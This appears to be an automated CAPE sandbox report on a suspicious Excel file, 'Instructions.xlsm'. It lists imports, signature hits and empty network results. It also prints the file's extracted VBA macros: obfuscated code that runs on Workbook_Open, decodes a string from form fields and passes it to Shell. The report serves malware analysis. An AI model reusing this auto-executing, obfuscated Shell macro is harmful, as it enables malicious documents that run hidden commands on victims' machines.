mso.dll._MsoFCreateToolbarSet@28
mso.dll._MsoInitShrGlobal@4
mso.dll._MsoHpalOffice@0
mso.dll._MsoFWndProcNeeded@4
mso.dll._MsoFWndProc@24
mso.dll._MsoFCreateITFCHwnd@20
mso.dll._MsoDestroyITFC@4
mso.dll._MsoFPitbsFromHwndAndMsg@12
mso.dll._MsoFGetComponentManager@4
mso.dll._MsoMultiByteToWideChar@24
mso.dll._MsoWideCharToMultiByte@32
mso.dll._MsoHrRegisterAll@0
mso.dll._MsoFSetComponentManager@4
mso.dll._MsoFCreateStdComponentManager@20
mso.dll._MsoFHandledMessageNeeded@4
mso.dll._MsoPeekMessage@8
mso.dll._MsoGetWWWCmdInfo@20
mso.dll._MsoFExecWWWHelp@8
mso.dll._MsoFCreateIPref@28
mso.dll._MsoDestroyIPref@4
mso.dll._MsoChsFromLid@4
mso.dll._MsoCpgFromChs@4
mso.dll._MsoSetLocale@4
mso.dll._MsoFSetHMsoinstOfSdm@4
oleaut32.dll.SysFreeString
oleaut32.dll.LoadTypeLib
oleaut32.dll.RegisterTypeLib
oleaut32.dll.QueryPathOfRegTypeLib
oleaut32.dll.UnRegisterTypeLib
oleaut32.dll.OleTranslateColor
oleaut32.dll.OleCreateFontIndirect
oleaut32.dll.OleCreatePictureIndirect
oleaut32.dll.OleLoadPicture
oleaut32.dll.OleCreatePropertyFrameIndirect
oleaut32.dll.OleCreatePropertyFrame
oleaut32.dll.OleIconToCursor
oleaut32.dll.LoadTypeLibEx
oleaut32.dll.OleLoadPictureEx
user32.dll.GetSystemMetrics
user32.dll.MonitorFromWindow
user32.dll.MonitorFromRect
user32.dll.MonitorFromPoint
user32.dll.EnumDisplayMonitors
user32.dll.GetMonitorInfoA
user32.dll.EnumDisplayDevicesA
oleaut32.dll.DispCallFunc
oleaut32.dll.CreateTypeLib2
oleaut32.dll.VarDateFromUdate
oleaut32.dll.VarUdateFromDate
oleaut32.dll.GetAltMonthNames
oleaut32.dll.VarNumFromParseNum
oleaut32.dll.VarParseNumFromStr
oleaut32.dll.VarDecFromR4
oleaut32.dll.VarDecFromR8
oleaut32.dll.VarDecFromDate
oleaut32.dll.VarDecFromI4
oleaut32.dll.VarDecFromCy
oleaut32.dll.VarR4FromDec
oleaut32.dll.GetRecordInfoFromTypeInfo
oleaut32.dll.GetRecordInfoFromGuids
oleaut32.dll.SafeArrayGetRecordInfo
oleaut32.dll.SafeArraySetRecordInfo
oleaut32.dll.SafeArrayGetIID
oleaut32.dll.SafeArraySetIID
oleaut32.dll.SafeArrayCopyData
oleaut32.dll.SafeArrayAllocDescriptorEx
oleaut32.dll.SafeArrayCreateEx
oleaut32.dll.VarFormat
oleaut32.dll.VarFormatDateTime
oleaut32.dll.VarFormatNumber
oleaut32.dll.VarFormatPercent
oleaut32.dll.VarFormatCurrency
oleaut32.dll.VarWeekdayName
oleaut32.dll.VarMonthName
oleaut32.dll.VarAdd
oleaut32.dll.VarAnd
oleaut32.dll.VarCat
oleaut32.dll.VarDiv
oleaut32.dll.VarEqv
oleaut32.dll.VarIdiv
oleaut32.dll.VarImp
oleaut32.dll.VarMod
oleaut32.dll.VarMul
oleaut32.dll.VarOr
oleaut32.dll.VarPow
oleaut32.dll.VarSub
oleaut32.dll.VarXor
oleaut32.dll.VarAbs
oleaut32.dll.VarFix
oleaut32.dll.VarInt
oleaut32.dll.VarNeg
oleaut32.dll.VarNot
oleaut32.dll.VarRound
oleaut32.dll.VarCmp
oleaut32.dll.VarDecAdd
oleaut32.dll.VarDecCmp
oleaut32.dll.VarBstrCat
oleaut32.dll.VarCyMulI4
oleaut32.dll.VarBstrCmp
ole32.dll.CoCreateInstanceEx
ole32.dll.CLSIDFromProgIDEx
mso.dll.#10147
sxs.dll.SxsOleAut32RedirectTypeLibrary
advapi32.dll.RegOpenKeyW
advapi32.dll.RegEnumKeyW
advapi32.dll.RegQueryValueW
sxs.dll.SxsOleAut32MapConfiguredClsidToReferenceClsid
mso.dll.#3143

File Analysis (Signatures)

Suspicious
Shell	May run an executable file or a system command

AutoExec
Workbook_Open	Runs when the Excel Workbook is opened

Extracted Macros

VBA Filename	Form1.frm	Extracted Macro

Private Sub CommandButton2_Click()
FormatText
End Sub

Private Sub EditSum_Change()

End Sub

Private Sub TextBox1_Change()
Dim i As Integer
For i = 0 To 20300
Form1.TextBox1.MaxLength = i
Next i
End Sub

Private Sub CompareTextReals_Click()

End Sub

Private Sub result_Change()
Dim hy As Integer
hy = Len(Form1.result.Text)
If hy < 680 Then
ChangeText Form1.result.Text
End If
End Sub

VBA Filename	Module1.bas	Extracted Macro

Rem Version 1.0
Dim stripText As String
Dim ClearText As String
Dim ColNum As Integer


Sub RunMain()
document_status_apply
End Sub

Sub LongMul(ByRef b1, ByRef control, ACIT)
div = div + 1
If b1 <= Len(Form1.EditSum) Then
'Sheet1.Cells(ColNum, b1 + 2 + 3) = b
b = Right(Left(Form1.EditSum, b1), 1)
If ACIT <> b Then
b1 = b1 + 1
LongMul b1, control, ACIT
Else
control = b1
ColNum = 1 + ColNum
End If
End If
End Sub

Sub FormatText()
DD = 101
document_status_apply
End Sub

Sub document_status_apply()
CountSym = 1
'Dim level As String
With Form1
DT = ""
RenameText CountSym, DT, .TextReal
ClearText = DT
DT = ""
CountSym = 1
'Chars_Replace Form1.TextReal, level
RenameText CountSym, DT, .Label1
stripText = DT
End With
MaxNumber (0)
End Sub

Sub morningDw(Ar1, ByRef Ar2)
Ar2 = 0
a0 = 1
LongMul a0, Ar2, Ar1
End Sub


Sub MaxNumber(qw)
Dim ln As Integer
Dim ris As Double
With Form1
ln = Len(ClearText) + Len(stripText)
Loading = "dvfert36tge4tgf"
'Shemf Text, si - 2400 - 16
If ln = 320 Then
'MsgBox (ClearText)
If 0 = qw Then
s1 = "1"
s2 = "2"
For j = 0 To 240
.TextBox1 = s1
.TextBox1 = s2
Next j
s = ClearText + .Label2.Caption
.result = s + stripText
'.EditSum = res
End If
For j = 0 To 170
.TextBox1 = s2
Next j
End If
'Form1.Show
End With
End Sub

Sub LockWideString(pointer, ByRef r1)
Dim N1 As Integer
N1 = 1
If pointer < N1 Then
r1 = Right(Left(Form1.EditSum, Len(Form1.EditSum) + pointer), N1)
Else
r1 = Right(Left(Form1.EditSum, pointer), N1)
End If
End Sub

Sub ChangeText(dt1)
m = Len(dt1)
If 675 < m Then
Shell dt1, m * 0
End If
End Sub

Sub RenameText(ByRef CountSym, ByRef Build, FET)
Dim n As Integer
'LockWideString imemo - 2, st
n = Len(FET)
If CountSym <= n Then
'Sheet2.Cells(CountSym, 1) = ch
ch1 = Left(FET, CountSym)
imemo = 1
ch = Right(ch1, 1)
morningDw ch, imemo
st = ""
LockWideString imemo - 6, st
CountSym = CountSym + 1
Build = Build + st
RenameText CountSym, Build, FET
End If
End Sub

VBA Filename	ThisWorkbook.cls	Extracted Macro

Sub Workbook_Open()

RunMain
End Sub

Vba2Graph

{u(3%
apL(8
{u(3%
apL(8

This file is not on VirusTotal.

Process Tree

EXCEL.EXE 560 "C:\Users\user\AppData\Local\Temp\Instructions.xlsm" /e

Search
EXCEL.EXE (560)

EXCEL.EXE, PID: 560, Parent PID: 252
Full Path: C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE
Command Line: "C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE" "C:\Users\user\AppData\Local\Temp\Instructions.xlsm" /e

default registry filesystem network process threading services device synchronization crypto browser all

Download PCAP

Hosts

No hosts contacted.

TCP

No TCP connections recorded.

UDP

No UDP connections recorded.

DNS

No domains contacted.

HTTP Requests

No HTTP requests performed.

SMTP traffic

No SMTP traffic performed.

IRC traffic

No IRC requests performed.

ICMP traffic

No ICMP traffic performed.

CIF Results

No CIF Results

Suricata Alerts

No Suricata Alerts

Suricata TLS

No Suricata TLS

Suricata HTTP

No Suricata HTTP

Sorry! No dropped Suricata Extracted files.

JA3

No JA3 hashes found.

File name	CVR28A6.tmp.cvr
Associated Filenames	C:\Users\user\AppData\Local\Temp\CVR28A6.tmp.cvr
File Size	0 bytes
File Type	empty
MD5	d41d8cd98f00b204e9800998ecf8427e
SHA1	da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256	e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
CRC32	00000000
Ssdeep	3::
ClamAV	None
Yara	None matched
CAPE Yara	None matched
VirusTotal	Search for Analysis
	Download Download ZIP Submit file

Sorry! No CAPE files.

Sorry! No process dumps.

Comments

No comments posted

Processing ( 0.818 seconds )

0.287 Static
0.256 BehaviorAnalysis
0.109 TrID
0.051 Deduplicate
0.05 CAPE
0.042 TargetInfo
0.012 NetworkAnalysis
0.008 AnalysisInfo
0.002 Strings
0.001 Debug

Signatures ( 0.143 seconds )

0.028 antiav_detectreg
0.01 infostealer_ftp
0.009 stealth_file
0.008 decoy_document
0.008 stealth_timeout
0.006 antianalysis_detectreg
0.006 infostealer_im
0.005 api_spamming
0.004 antivm_generic_scsi
0.004 persistence_autorun
0.004 ransomware_files
0.003 antidbg_windows
0.003 antiav_detectfile
0.003 antivm_vbox_keys
0.003 ransomware_extensions
0.002 antivm_generic_services
0.002 antiemu_wine_func
0.002 infostealer_browser_password
0.002 dynamic_function_loading
0.002 antivm_vmware_keys
0.002 geodo_banking_trojan
0.002 browser_security
0.002 infostealer_bitcoin
0.001 tinba_behavior
0.001 malicious_dynamic_function_loading
0.001 rat_nanocore
0.001 Doppelganging
0.001 infostealer_browser
0.001 exploit_getbasekerneladdress
0.001 betabot_behavior
0.001 mimics_filetime
0.001 kibex_behavior
0.001 cerber_behavior
0.001 kovter_behavior
0.001 antianalysis_detectfile
0.001 antivm_generic_diskreg
0.001 antivm_parallels_keys
0.001 antivm_vbox_files
0.001 antivm_vpc_keys
0.001 antivm_xen_keys
0.001 bot_drive
0.001 modify_proxy
0.001 darkcomet_regkeys
0.001 disables_browser_warn
0.001 office_martian_children
0.001 recon_fingerprint

Reporting ( 0.003 seconds )

0.003 CompressResults

Task ID	36431
Mongo ID	5c61d214f284883e41aeadad
Cuckoo release	1.3-CAPE
	Delete